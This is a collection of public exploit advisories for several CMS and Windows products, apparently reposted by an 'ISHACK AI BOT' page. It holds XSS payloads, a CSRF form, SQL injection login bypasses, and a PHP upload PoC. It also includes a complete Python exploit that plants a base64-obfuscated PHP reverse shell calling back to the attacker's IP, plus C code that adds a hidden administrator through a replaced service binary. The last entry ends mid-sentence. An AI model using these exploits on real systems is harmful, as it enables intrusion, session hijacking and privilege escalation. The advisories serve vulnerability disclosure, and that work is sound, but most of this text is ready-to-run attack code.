ISHACK AI BOT

# Exploit Title: moziloCMS 2.0 - Persistent Cross-Site Scripting (Authenticated) # Date: 2020-08-31 # Exploit Author: Abdulkadir Kaya # Vendor Homepage: https://www.mozilo.de/ # Version: 2.0 # Tested on: Windows & WampServer 1- Go to following url. >> http://(HOST)/(PATH)/admin/ 2- Login the admin panel. 3- Go to "Content". 4- Write XSS payload in the "Content Page" section. 5- Save. NOTE: Content Page must be in the Category. ((XSS Payloads)) 1-<script>alert("XSS Confirmed");</script> 2-<script>alert(document.cookie);</script> 3-<script>alert(document.domain);</script> (( REQUEST )) POST /mozilo/admin/index.php HTTP/1.1 Host: 127.0.0.1:8088 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html, */*; q=0.01 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:8088/mozilo/admin/index.php?nojs=true&action=catpage&multi=true Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 269 Origin: http://127.0.0.1:8088 Connection: close Cookie: mozilo_editor_settings=true,false,mozilo,12px; PHPSESSID=1jlbsfbodasafasl121chjv5947j0s; MOZILOID_875895d61510deasdfa1a7ad7cc6047f819=5tqsm5d5nvphqimdpqcnq4tqit action=catpage&sort_array[%253Cscript%253Ealert%2528%2522XSS%2520Confirmed%2521%2522%2529%253C%252Fscript%253E] =%5BWilkommen%5D&changeart=cat_page_move&cat_page_change[%253Cscript%253Ealert%2528%2522XSS%2520Confirmed%2521 %2522%2529%253C%252Fscript%253E]=%5BWilkommen%5D

# Exploit Title: Stock Management System 1.0 - Cross-Site Request Forgery (Change Username) # Exploit Author: Bobby Cooke & Adeeb Shah (@hyd3sec) # CVE ID: N/A # Date: 2020-09-01 # Vendor Homepage: https://www.sourcecodester.com/php/14366/stock-management-system-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip # Version: 1.0 # Tested On: Windows 10 Pro + XAMPP | Python 2.7 # CWE-352: Cross-Site Request Forgery (CSRF) # CVSS Base Score: 5.9 | Impact Subscore: 4.2 | Exploitability Subscore: 1.6 # CVSS Vector: AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H # Vulnerability Description: # Cross-Site Request Forgery (CSRF) vulnerability in 'changeUsername.php' webpage of SourceCodesters # Stock Management System v1.0 allows remote attackers to deny future logins via changing the # authenticated victims username when they visit a third-party site. # PoC - Form Method # Change <TARGET-HOST> to target IP address or hostname <html> <body> <form action="http://<TARGET-HOST>/stock/php_action/changeUsername.php" method="POST"> <input type="hidden" name="username" value="BOKU" /> <input type="hidden" name="user_id" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>

#!/usr/bin/python3 # Exploit Title: Rukovoditel 2.7.1 - Remote Code Execution (Authenticated) # Exploit Author: @_danyx07 # Vendor Homepage: https://www.rukovoditel.net/ # Software Link: https://www.rukovoditel.net/download.php # Version: Rukovoditel < 2.7 # Tested on: Debian 9 Rukovoditel 2.6.1 # CVE : CVE-2020-11819 # Description : This exploit has two modes of execution, using the session fixation vulnerability (CVE-2020-15946) or using the access credentials of any account under any profile. # With the --type L option, this script will create a malicious link, if the link is accessed in a browser by the victim, an arbitrary session identifier will be set that will be used to steal their session after uploading an image with PHP content on their photo profile, and then use local file include (CVE-2020-11819) to get a nice reverse shell. # Or, with the options --type C -u <username> -p <password> you can provide credentials, load the image with PHP content and use local file inclusion (CVE-2020-11819) to achieve the execution of code. # Protip: remember to check if the registration module is enabled ;) import sys import requests from bs4 import BeautifulSoup import re import base64 import argparse import os from shutil import copyfile import datetime import hashlib import socket import threading import time import random import uuid __version__ = '1.0' parser = argparse.ArgumentParser(description= "Post-authenticate RCE for rukovoditel, script version %s" % __version__, usage='\n %(prog)s -t <target> -a L --ip attacker IP --port attacker port [options]\n %(prog)s -t <target> -a C -u <username> -p <password> --ip attacker IP --port attacker port [options]\n\n') parser.add_argument('-t', '--target', metavar='URL', type=str, required=True, help='URL/Full path to CMS Rukovoditel http://url/path/to/cms/') parser.add_argument('-u', '--user', type=str, help='Username for authentication') parser.add_argument('-p', '--password', type=str, help='Password for authentication') parser.add_argument('-a', '--type', required=True, type=str, help='Use -a L to generate the link and steal the session or use -a C if you have access credentials to the web application') parser.add_argument('--ip', metavar="IP_ATTACKER", required=True, type=str, help='IP attacker for reverse shell!') parser.add_argument('--port', metavar="PORT_ATTACKER", required=True, type=str, help='Port for reverse shell connection') parser.add_argument('--proxy', metavar="PROXY", help='Setup http proxy for debbugin http://127.0.0.1:8080') args = parser.parse_args() # Global variables s = requests.Session() url = args.target user = args.user pwd = args.password typeAttack = args.type IP=args.ip PORT=args.port proxyDict = {"http" : args.proxy, "https" : args.proxy} csrf_token="" pht=None flag_access=False sid = uuid.uuid4().hex def serverShell(): server = socket.socket(socket.AF_INET,socket.SOCK_STREAM) server_address = (IP,int(PORT)) server.bind((server_address)) server.listen(0) print("[+] Listening on %s:%s" % (IP,PORT)) conn,addr = server.accept() print("[+] Accepted connection from %s and port %s" % (addr[0],addr[1])) print("Type 'quit' for exit") server.settimeout(10) while True: cmd = input() if cmd == 'quit': print("[-] Closing connection with the shell") conn.close() server.close() break cmd = cmd + "\n" if len(str(cmd)) > 0: command = conn.send(cmd.encode('utf-8')) try: response = conn.recv(2048) print(response.decode('utf-8')) except server.timeout: print("Didn't receive data!") finally: server.close() conn.close() def authByCookie(): global flag_access global sid url_hijack = url+'index.php?sid='+sid url_in = url+"index.php?module=dashboard/" print("[+] Send this URL to the victim -> %s" % url_hijack) while True: if flag_access == True: break def checkAccess(stop): global flag_access time.sleep(3) while True: if typeAttack == 'L': s.cookies.clear() s.cookies.set('sid',sid) url_login = url+'index.php?module=users/account' r = s.get(url_login, proxies=proxyDict) response = r.text if response.find('account_form') != -1: print("[+] Access granted!") soup = BeautifulSoup(response, 'lxml') csrf_token = soup.find('input')['value'] flag_access=True else: print("[-] Waiting for access") if stop(): break time.sleep(3) return 0 def makeAuth(): url_login = url+'index.php?module=users/login&action=login' r = s.get(url_login, proxies=proxyDict) html = r.text soup = BeautifulSoup(html, 'lxml') csrf_token = soup.find('input')['value'] print("[+] Getting CSRF Token %s" % csrf_token ) auth = {'username':user, 'password':pwd, 'form_session_token':csrf_token} print("[+] Trying to authenticate with username %s" % user) r = s.post(url_login, data=auth, proxies=proxyDict) response = r.text if response.find("login_form") != -1: print("[-] Authentication failed... No match for Username and/or Password!") return -1 def createEvilFile(): rv = """ /*<?php /**/ unlink(__FILE__); @error_reporting(0); @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0); $dis=@ini_get('disable_functions'); if(!empty($dis)){ $dis=preg_replace('/[, ]+/', ',', $dis); $dis=explode(',', $dis); $dis=array_map('trim', $dis); }else{ $dis=array(); } $ipaddr='"""+IP+"""'; $port="""+PORT+"""; if(!function_exists('SsMEEaClAOR')){ function SsMEEaClAOR($c){ global $dis; if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) { $c=$c." 2>&1\\n"; } $RhoVbBR='is_callable'; $vaVrJ='in_array'; if($RhoVbBR('proc_open')and!$vaVrJ('proc_open',$dis)){ $handle=proc_open($c,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes); $o=NULL; while(!feof($pipes[1])){ $o.=fread($pipes[1],1024); } @proc_close($handle); }else if($RhoVbBR('shell_exec')and!$vaVrJ('shell_exec',$dis)){ $o=shell_exec($c); }else if($RhoVbBR('exec')and!$vaVrJ('exec',$dis)){ $o=array(); exec($c,$o); $o=join(chr(10),$o).chr(10); }else if($RhoVbBR('popen')and!$vaVrJ('popen',$dis)){ $fp=popen($c,'r'); $o=NULL; if(is_resource($fp)){ while(!feof($fp)){ $o.=fread($fp,1024); } } @pclose($fp); }else if($RhoVbBR('system')and!$vaVrJ('system',$dis)){ ob_start(); system($c); $o=ob_get_contents(); ob_end_clean(); }else if($RhoVbBR('passthru')and!$vaVrJ('passthru',$dis)){ ob_start(); passthru($c); $o=ob_get_contents(); ob_end_clean(); }else { $o=0; } return $o; } } $nofuncs='no exec functions'; if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){ $s=@fsockopen("tcp://$ipaddr",$port); while($c=fread($s,2048)){ $out = ''; if(substr($c,0,3) == 'cd '){ chdir(substr($c,3,-1)); } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { break; }else{ $out=SsMEEaClAOR(substr($c,0,-1)); if($out===false){ fwrite($s,$nofuncs); break; } } fwrite($s,$out); } fclose($s); }else{ $s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP); @socket_connect($s,$ipaddr,$port); @socket_write($s,"socket_create"); while($c=@socket_read($s,2048)){ $out = ''; if(substr($c,0,3) == 'cd '){ chdir(substr($c,3,-1)); } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { break; }else{ $out=SsMEEaClAOR(substr($c,0,-1)); if($out===false){ @socket_write($s,$nofuncs); break; } } @socket_write($s,$out,strlen($out)); } @socket_close($s); } """ encoded_bytes = rv.encode('ascii') b64_bytes = base64.b64encode(encoded_bytes); payload = b64_bytes.decode('ascii') createImage() copyfile("./tux.png","/tmp/evil-tux.png") evilF = open('/tmp/evil-tux.png','a+') evilF.write("<?php eval(base64_decode(\""+payload+"\")); ?>") evilF.close() print("[+] Evil file created!") def searchFile(etime): cdate = etime for i in range(3600,52200,900): h1 = hashlib.sha1() img1 = str(cdate+i)+"_evil-tux.png" h1.update(img1.encode('utf-8')) r = requests.get(url+"uploads/users/"+h1.hexdigest()) if r.status_code == 200: print(r.text) return h1.hexdigest() h2 = hashlib.sha1() img2 = str(cdate-i)+"_evil-tux.png" h2.update(img2.encode('utf-8')) r = requests.get(url+"uploads/users/"+h2.hexdigest()) if r.status_code == 200: #print(r.text) return h2.hexdigest() i+1800 return "" def uploadFile(): global pht print("[+] Trying to upload evil file!...") form_data1 = {'form_session_token':csrf_token, 'fields[7]':'Administrator', 'fields[8]':'PoC', 'fields[9]':'[email protected]', 'fields[13]':'english.php'} files = {'fields[10]':open('/tmp/evil-tux.png','rb')} url_upload = url+'index.php?module=users/account&action=update' r = s.post(url_upload, files=files, data=form_data1, proxies=proxyDict) date = r.headers['Date'] etime = int(datetime.datetime.strptime(date, '%a, %d %b %Y %H:%M:%S GMT').strftime('%s')) #reg = re.findall(r"([a-fA-F\d]{40})",r.text) reg = None if not reg: print("[-] The file name was not found in the response :(") fileUp = searchFile(etime) else: fileUp = reg[0] print("[+] Looking for the file name uploaded...") r = s.get(url+"/uploads/users/"+fileUp) if r.status_code!=200: print("[-] File name couldn't be found!") exit() pht="../../uploads/users/"+fileUp print("[+] String for path traversal is %s" % pht) def updateProfile(oplang="english.php"): if oplang == "english.php": print("[+] Updating profile with language %s " % oplang) payload = {'form_session_token':csrf_token, 'fields[7]':'Administrator', 'fields[8]':'PoC', 'fields[9]':'[email protected]', 'fields[13]':oplang, 'fields[10]':''} files = {"":""} url_upload = url+'index.php?module=users/account&action=update' r = s.post(url_upload, files=files, data=payload, proxies=proxyDict) return 0 else: print("[+] Updating user profile field[13] <--file inclusion through path traversal... Wait for the shell :)") payload = {'form_session_token':csrf_token, 'fields[7]':'Administrator', 'fields[8]':'PoC', 'fields[9]':'[email protected]', 'fields[13]':oplang, 'fields[10]':''} files = {"":""} url_upload = url+'index.php?module=users/account&action=update' r = s.post(url_upload, files=files, data=payload, proxies=proxyDict) serverShell() def createImage(): if os.path.exists("tux.png"): return imgb64 = "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" f = open("tux.png","wb") f.write(base64.b64decode(imgb64)) f.close() def main(): s.cookies.clear() stop_threads = False check_thread = threading.Thread(target=checkAccess, args =(lambda : stop_threads, )) check_thread.start() if typeAttack == "C": if makeAuth() == -1: stop_threads = True check_thread.join() print("[-] Exiting...") exit(0) elif typeAttack == "L": authByCookie() else: "[!] You must specify the type of attack with the -a option" exit() createEvilFile() uploadFile() updateProfile(pht) stop_threads = True check_thread.join() print("[+] Starting clean up...") updateProfile() os.remove("/tmp/evil-tux.png") print("[+] Exiting...") if __name__ == '__main__': main() s.cookies.clear() """try: main() s.cookies.clear() except Exception as e: print("[\033[91m!\033[0m] Error: %s" % e)"""

# Exploit Title: Savsoft Quiz Enterprise Version 5.5 - Persistent Cross-Site Scripting # Date: 2020-09-01 # Exploit Author: Hemant Patidar (HemantSolo) # Vendor Homepage: https://savsoftquiz.com/ # Software Link: https://savsoftquiz.com/web/demo.php # Version: 5.0 # Tested on: Windows 10/Kali Linux # Contact: https://www.linkedin.com/in/hemantsolo/ Stored Cross-site scripting(XSS): Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser. Attack vector: This vulnerability can results attacker to inject the XSS payload in User Registration section and each time admin visits the manage user section from admin panel, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: First Name, Last Name 1. Go to the registration page. 2. Fill all the details and put this payload in First and Last Name "<script>alert("OPPS")</script>" 3. Now go to the admin panel and the XSS will be triggered. POST /savsoftquiz_v5_enterprise/index.php/login/insert_user/ HTTP/1.1 Host: TARGET Connection: close Content-Length: 187 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: https://savsoftquiz.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://TARGET/savsoftquiz_v5_enterprise/index.php/login/registration/ Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: _ga=GA1.2.757300437.1598544895; _gid=GA1.2.1240991040.1598544895; ci_session=mm5q58p28e620n9im0imeildnvabkoeg email=hemantpatidar1337%40gmail.com&password=test&first_name=<script>alert("OPPS")</script>&last_name=<script>alert("OPPS")</script>&contact_no=0000000000&gid%5B%5D=1

# Exploit Title: BloodX CMS 1.0 - Authentication Bypass # Google Dork: N/A # Date: 2020-09-02 # Exploit Author: BKpatron # Vendor Homepage: https://github.com/diveshlunker/BloodX # Software Link: https://github.com/diveshlunker/BloodX/archive/master.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # my website: bkpatron.com # Vulnerability: Attacker can bypass login page and access to dashboard page # vulnerable file : login.php # Parameter & Payload: '=''or' # Proof of Concept: http://localhost/BloodX-master/login.php POST /BloodX-master/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 63 Referer: http:/localhost/BloodX-master/login.php Cookie: PHPSESSID=97vbf440gvh0fep3iuqusaqht Connection: keep-alive Upgrade-Insecure-Requests: 1 email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN

# Exploit Title: SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated) # Date: 2020-09-02 # Exploit Author: v1n1v131r4 # Vendor Homepage: https://sitemagic.org/ # Software Link: https://sitemagic.org/Download.html # Version: 4.4.2 # Tested on: Ubuntu 18.04 # CVE : N/A # PoC: https://github.com/V1n1v131r4/Unrestricted-File-Upload-on-SiteMagic-CMS-4.4.2/blob/master/README.md Step 1 - Request POST /sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages HTTP/1.1 Host: example.org User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pt-BR,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------144837887339078243581158835832 Content-Length: 538 Origin: example.org DNT: 1 Connection: close Referer: http://example.org/sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages Cookie: timezone=America/Argentina/Buenos_Aires; cookieconsent_status=dismiss; SMSESSION407f70d0a9400582=f93d614ad0046ec76e41f3613d97da59 Upgrade-Insecure-Requests: 1 -----------------------------144837887339078243581158835832 Content-Disposition: form-data; name="SMInputSMFilesUpload"; filename="info.php" Content-Type: application/x-php <?php phpinfo(); ?> -----------------------------144837887339078243581158835832 Content-Disposition: form-data; name="SMPostBackControl" -----------------------------144837887339078243581158835832 Content-Disposition: form-data; name="SMRequestToken" f9f116f33c012ce5e67f52dffc7e6bc6 -----------------------------144837887339078243581158835832-- Step 2 - Response Status 200 OK Version HTTP/1.1 Transferred 26,20 KB (25,80 KB size) Referrer Policy no-referrer-when-downgrade Step 3 - Read file uploaded http://example.org/sitemagic/files/images/info.php

# Exploit Title: Daily Tracker System 1.0 - Authentication Bypass # Exploit Author: Adeeb Shah (@hyd3sec) & Bobby Cooke (boku) # CVE ID: CVE-2020-24193 # Date: September 2, 2020 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/download-code?nid=14372&title=Daily+Tracker+System+in+PHP%2FMySQL # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 # Vulnerable Source Code if(isset($_POST['login'])) { $email=$_POST['email']; $password=md5($_POST['password']); $query=mysqli_query($con,"select ID from tbluser where Email='$email' && Password='$password ' "); $ret=mysqli_fetch_array($query); if($ret>0){ $_SESSION['detsuid']=$ret['ID']; header('location:dashboard.php'); } else{ $msg="Invalid Details."; } } ?> # Malicious POST Request to https://TARGET/dets/index.php HTTP/1.1 POST /dets/index.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://172.16.65.130/dets/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 48 DNT: 1 Connection: close Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s Upgrade-Insecure-Requests: 1 email='+or+1%3d1+--+hyd3sec&password=badPass&login=login

# Exploit Title: BarracudaDrive v6.5 - Insecure Folder Permissions # Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) # CVE ID: N/A # Date: 2020-09-01 # Vendor Homepage: https://barracudaserver.com/ # Software Link: https://download.cnet.com/BarracudaDrive/3001-18506_4-10723210.html # Version: v6.5 # Tested On: Windows 10 Pro # CVSS Base Score: 8.8 | Impact Subscore: 6.0 | Exploitability Subscore: 2.0 # CVSS Vector: AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H # CWE-276: Incorrect Default Permissions # CWE-732: Incorrect Permission Assignment for Critical Resource # Vulnerability Description: # Insecure Service File Permissions in bd service in Real Time Logics BarracudaDrive v6.5 # allows local low-privilege attacker to escalate privileges to admin via replacing the bd.exe # file and restarting the computer where the malicious code will be executed as 'LocalSystem' # on the next startup. ## Insecure Folder Permission C:\>cacls C:\bd C:\bd BUILTIN\Administrators:(OI)(CI)(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F BUILTIN\Users:(OI)(CI)(ID)R NT AUTHORITY\Authenticated Users:(ID)C NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C ## Insecure File/Service Permission C:\>cacls C:\bd\bd.exe C:\bd\bd.exe BUILTIN\Administrators:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Users:(ID)R NT AUTHORITY\Authenticated Users:(ID)C C:\>sc qc bd [SC] QueryServiceConfig SUCCESS SERVICE_NAME: bd TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\bd\bd.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : BarracudaDrive ( bd ) service DEPENDENCIES : Tcpip SERVICE_START_NAME : LocalSystem ## Local Privilege Escalation Proof of Concept #0. Download & install #1. Create low privileged user & change to the user ## As admin C:\>net user lowpriv Password123! /add C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full" User name lowpriv Local Group Memberships *Users Global Group memberships *None #2. Move the Service EXE to a new name C:\bd>whoami desktop\lowpriv C:\bd>move bd.exe bd.service.exe 1 file(s) moved. #3. Create malicious binary on kali linux ## Add Admin User C Code kali# cat addAdmin.c int main(void){ system("net user boku mypassword /add"); system("net localgroup Administrators boku /add"); WinExec("C:\\bd\\bd.service.exe",0); return 0; } ## Compile Code kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o bd.exe #4. Transfer created 'bd.exe' to the Windows Host #5. Move the created 'bd.exe' binary to the 'C:\bd\' Folder C:\bd>move C:\Users\lowpriv\Downloads\bd.exe . #6. Check that exploit admin user doesn't exit C:\bd>net user boku The user name could not be found #6. Reboot the Computer C:\bd>shutdown /r #7. Login & look at that new Admin C:\Users\lowpriv>net user boku | findstr /i "Membership Name" | findstr /v "Full" User name boku Local Group Memberships *Administrators *Users Global Group memberships *None

# Exploit Title: Nord VPN-6.31.13.0 - 'nordvpn-service' Unquoted Service Path # Discovery Date: 2020-09-03 # Discovery by: chipo # Vendor Homepage: https://nordvpn.com # Software Link : https://downloads.nordcdn.com/apps/windows/10/NordVPN/latest/NordVPNSetup.exe # Tested Version: 6.31.13.0 # Tested on OS: Windows 10 Pro x64 es # Vulnerability Type: Unquoted Service Path # Find the discover Unquoted Service Path Vulnerability: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ovpnconnect" | findstr /i /v """ nordvpn-service nordvpn-service C:\Program Files\NordVPN\nordvpn-service.exe # Service info: C:\>sc qc servicio [SC] QueryServiceConfig SUCCESS NOMBRE_SERVICIO: nordvpn-service TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\NordVPN\nordvpn-service.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : nordvpn-service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt to exploit this vulnerability could allow to execute code during startup or 